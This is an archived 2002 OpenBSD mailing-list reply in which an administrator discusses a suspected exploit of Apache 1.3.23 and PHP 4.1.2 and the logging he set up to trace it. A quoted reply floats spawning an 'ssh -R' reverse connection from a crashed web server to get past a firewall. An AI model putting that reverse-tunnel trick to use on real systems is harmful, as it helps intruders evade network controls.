[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: possible apache flaw ?

To: "Marc Matteo" <marcm@lectroid.net>, <misc@openbsd.org>
Subject: Re: possible apache flaw ?
From: "veins" <veins@skreel.org>
Date: Mon, 11 Mar 2002 10:27:13 +0100
References: <01bb01c1c8c0$d176bba0$0403a8c0@guinness> <20020311055801.D27654@eisenschmidt.org> <01ca01c1c8c2$014e64d0$0403a8c0@guinness> <004401c1c8d5$49d52820$e701170a@ZZDELL2> <022701c1c8d6$00d0b940$0403a8c0@guinness> <1015837824.1166.13.camel@johnbigboote>

> > in php scripts as even the most insecure script would not make apache
> > segfault and "give" someone a shell.
>
> I doubt segfaulting... but I see no reason why bad PHP programming
> wouldn't happily give me a shell :).

yeah I meant give you a shell as a result of apache segfaulting.

> > I didn't get the chance to portscan the server and
> > see if it really
> > binds a shell to some port because of pf having very restrictrive rules
but
> > that would
> > explain the idling (user 'www' loggued in for 10 minutes idling before I
> > kill the process).
>
> Check if there are remote ssh sessions.  If I had a way to get Apache
> (or PHP or whatever) to barf while tucked behind a "restrictive"
> firewall I'd have it spawn an 'ssh -R ...' and have it connect to me :).

There are no remote ssh session the shell seems to keep idling. I don't
think
that the guy (if it really is someone, what i am really starting to believe)
has
the skills to rewrite a shellcode. Looking at the logs it seems like it is a
script kiddie using someone's else exploit (what cracker would be dumb
enough to trigger over a hundred attacks in a few days without fearing to
get discovered). What I think is that this guy saw that there was something
going wrong but ssh not being accessible he would not be able to get in.

> The segfault bit is disturbing though.  Either your *really* screwed
> something up :) or someone's got an interesting exploit.

Well, I don't know what I would have screwed up, really. I believe there
is some exploit but there are just rumors, I don't know what is true and
what is false, but all this makes me wonder.

> So to be clear, this is NOT the default Apache from OpenBSD but the
> latest flavor from apache.org?  Same with PHP?

It is apache 1.3.23 and php 4.1.2.

> > is constantly auditing logs in search of weird things.
>
> Hmmm, and a packet sniffer on another box would be fun :).

Yeah, I configured pf on the gateway to log evvery packet ingoing and
outgoing. I should be able to retrace which client caused apache to segfault
as apache doesn't log the IP address of the client in this particular case.

> Can you tell, from your logs, say login times for the www users and the
> last pages accessed?

Nope, that's why I enabled full logging.

> Marc


veins
-- bofh at kheos.net && skreel.org - bofh, the choice of a degenerated
administration.
'Un jour, un canard qui se prénommait Harry dit à une cane: ris, cane ! Et
la cane a ri.'

References:
- possible apache flaw ?
  - From: "veins" <veins@skreel.org>
- Re: possible apache flaw ?
  - From: John Eisenschmidt <jweisen@eisenschmidt.org>
- Re: possible apache flaw ?
  - From: "veins" <veins@skreel.org>
- Re: possible apache flaw ?
  - From: "Joel Rees" <joel@alpsgiken.gr.jp>
- Re: possible apache flaw ?
  - From: "veins" <veins@skreel.org>
- Re: possible apache flaw ?
  - From: Marc Matteo <marcm@lectroid.net>

Prev by Date: Re: PAM (libpam) on OpenBSD ?
Next by Date: kernel panic w/ ccd on 3.0
Prev by thread: Re: possible apache flaw ?
Next by thread: Re: possible apache flaw ?
Index(es):
- Date
- Thread